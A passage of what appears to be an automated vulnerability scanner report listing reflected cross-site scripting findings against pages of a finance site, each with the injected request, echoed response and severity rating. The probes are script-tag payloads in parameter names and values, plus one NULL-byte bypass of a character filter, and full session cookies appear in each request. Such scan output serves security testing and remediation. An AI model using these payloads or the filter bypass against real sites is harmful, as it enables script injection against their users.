Cookie: ARPT=VRWOZXS192.168.100.27CKOUJ; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; adc=RSP

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 16:26:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 16:26:26 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: adc=RSP; path=/;
Content-Length: 17748

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<a href='/blog.html?b441b'><script>alert(1)</script>2d6ce3f1de5=1&page=1'>
...[SNIP]...

4.484. http://www.myfinances.com/blog.html [page parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /blog.html

Issue detail

The value of the page request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload %007485b'><script>alert(1)</script>abffe3120a4 was submitted in the page parameter. This input was echoed as 7485b'><script>alert(1)</script>abffe3120a4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /blog.html?page=1%007485b'><script>alert(1)</script>abffe3120a4 HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:01:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:01:58 GMT
Content-Length: 17623
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<a href='/blog.html?%007485b'><script>alert(1)</script>abffe3120a4&page=1'>
...[SNIP]...

4.485. http://www.myfinances.com/blog/3171093.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /blog/3171093.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e47d"><script>alert(1)</script>cddac6d471e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/3171093.html?9e47d"><script>alert(1)</script>cddac6d471e=1 HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:05:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:05:23 GMT
Content-Length: 13431
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<a target="_blank" href="http://twitter.com/home?status=Check out this 'How The Dow Jones Industrial Average Is Calculated' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3171093.html?9e47d"><script>alert(1)</script>cddac6d471e=1'">
...[SNIP]...

4.486. http://www.myfinances.com/blog/3171103.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /blog/3171103.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c279"><script>alert(1)</script>be8d26e1d8b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/3171103.html?5c279"><script>alert(1)</script>be8d26e1d8b=1 HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:05:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:05:21 GMT
Content-Length: 13823
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<a target="_blank" href="http://twitter.com/home?status=Check out this 'How To Know If You're On Track For Retirement' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3171103.html?5c279"><script>alert(1)</script>be8d26e1d8b=1'">
...[SNIP]...

4.487. http://www.myfinances.com/blog/3227953.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /blog/3227953.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 434d0"><script>alert(1)</script>5608a968905 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/3227953.html?434d0"><script>alert(1)</script>5608a968905=1 HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:05:13 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:05:13 GMT
Content-Length: 14027
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<a target="_blank" href="http://twitter.com/home?status=Check out this 'How to Estimate the Value of Your Home' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3227953.html?434d0"><script>alert(1)</script>5608a968905=1'">
...[SNIP]...

4.488. http://www.myfinances.com/blog/3227963.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /blog/3227963.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a08c1"><script>alert(1)</script>dd5051c38cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/3227963.html?a08c1"><script>alert(1)</script>dd5051c38cf=1 HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:04:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:04:58 GMT
Content-Length: 13645
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<a target="_blank" href="http://twitter.com/home?status=Check out this 'Avoid Wash Sales' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3227963.html?a08c1"><script>alert(1)</script>dd5051c38cf=1'">
...[SNIP]...

4.489. http://www.myfinances.com/blog/3241183.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /blog/3241183.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a33a3"><script>alert(1)</script>f30bec36298 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/3241183.html?a33a3"><script>alert(1)</script>f30bec36298=1 HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:04:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:04:56 GMT
Content-Length: 13681
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<a target="_blank" href="http://twitter.com/home?status=Check out this 'Creating Your Own Dividends' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3241183.html?a33a3"><script>alert(1)</script>f30bec36298=1'">
...[SNIP]...

4.490. http://www.myfinances.com/blog/3241193.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /blog/3241193.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d892b"><script>alert(1)</script>28506c4b154 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/3241193.html?d892b"><script>alert(1)</script>28506c4b154=1 HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:04:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:04:54 GMT
Content-Length: 14125
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<a target="_blank" href="http://twitter.com/home?status=Check out this 'How To Protect Yourself From Inflation' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3241193.html?d892b"><script>alert(1)</script>28506c4b154=1'">
...[SNIP]...

4.491. http://www.myfinances.com/blog/3299523.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /blog/3299523.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7dffd"><script>alert(1)</script>ccc9f3547f8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/3299523.html?7dffd"><script>alert(1)</script>ccc9f3547f8=1 HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:04:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:04:39 GMT
Content-Length: 13301
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<a target="_blank" href="http://twitter.com/home?status=Check out this 'Don't Forget About Inflation Risk' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3299523.html?7dffd"><script>alert(1)</script>ccc9f3547f8=1'">
...[SNIP]...

4.492. http://www.myfinances.com/blog/3299533.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /blog/3299533.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3cbc8"><script>alert(1)</script>473ebcbf25d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/3299533.html?3cbc8"><script>alert(1)</script>473ebcbf25d=1 HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:04:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:04:56 GMT
Content-Length: 13628
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
a target="_blank" href="http://twitter.com/home?status=Check out this 'Who is JTWROS and Why are They Listed on My Account Statement?' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3299533.html?3cbc8"><script>alert(1)</script>473ebcbf25d=1'">
...[SNIP]...

4.493. http://www.myfinances.com/blog/3299543.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /blog/3299543.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86ca0"><script>alert(1)</script>6a9de3808f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/3299543.html?86ca0"><script>alert(1)</script>6a9de3808f3=1 HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:05:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:05:03 GMT
Content-Length: 13601
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<a target="_blank" href="http://twitter.com/home?status=Check out this 'How to Choose an Appropriate Target Date Fund' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3299543.html?86ca0"><script>alert(1)</script>6a9de3808f3=1'">
...[SNIP]...

4.494. http://www.myfinances.com/blog/3299553.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /blog/3299553.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f745d"><script>alert(1)</script>799a50af86f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/3299553.html?f745d"><script>alert(1)</script>799a50af86f=1 HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:04:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:04:54 GMT
Content-Length: 13663
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<a target="_blank" href="http://twitter.com/home?status=Check out this 'How To Choose Between a Traditional 401(K) and a Roth 401(K)' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3299553.html?f745d"><script>alert(1)</script>799a50af86f=1'">
...[SNIP]...

4.495. http://www.myfinances.com/budget.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
